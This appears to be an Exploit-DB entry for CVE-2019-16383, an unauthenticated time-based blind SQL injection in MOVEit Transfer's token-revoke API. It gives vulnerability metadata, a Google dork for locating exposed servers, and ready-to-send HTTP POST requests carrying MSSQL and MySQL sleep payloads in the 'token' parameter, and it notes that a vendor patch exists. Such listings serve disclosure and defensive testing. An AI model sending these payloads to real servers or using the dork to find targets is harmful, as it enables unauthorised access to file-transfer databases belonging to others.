header-logo
Suggest Exploit
vendor:
MOVEit Transfer
by:
Aviv Beniash, Noam Moshe
9.4
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: MOVEit Transfer
Affected Version From: MOVEit Transfer 2018 SP2 before 10.2.4
Affected Version To: 2019.1 before 11.1.1
Patch Exists: YES
Related CWE: CVE-2019-16383
CPE: 2.3:a:ipswitch:moveit_transfer:2018:sp2:*:*:*:*:*:*:*
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

MOVEit Transfer 11.1.1 – ‘token’ Unauthenticated SQL Injection

The API call for revoking logon tokens is vulnerable to a Time based blind SQL injection via the 'token' parameter. MSSQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 32 token='; WAITFOR DELAY '0:0:10'-- MySQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 21 token=' OR SLEEP(10);--

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection 
# Google Dork: inurl:human.aspx intext:moveit
# Date: 2020-04-12
# Exploit Authors: Aviv Beniash, Noam Moshe
# Vendor Homepage: https://www.ipswitch.com/
# Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1
# CVE : CVE-2019-16383
# 
# Related Resources:
# https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2019-16383

# Description:
# The API call for revoking logon tokens is vulnerable to a
# Time based blind SQL injection via the 'token' parameter

# MSSQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

token='; WAITFOR DELAY '0:0:10'--


# MySQL payload:

POST /api/v1/token/revoke HTTP/1.1
Host: moveittransferstg
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

token=' OR SLEEP(10);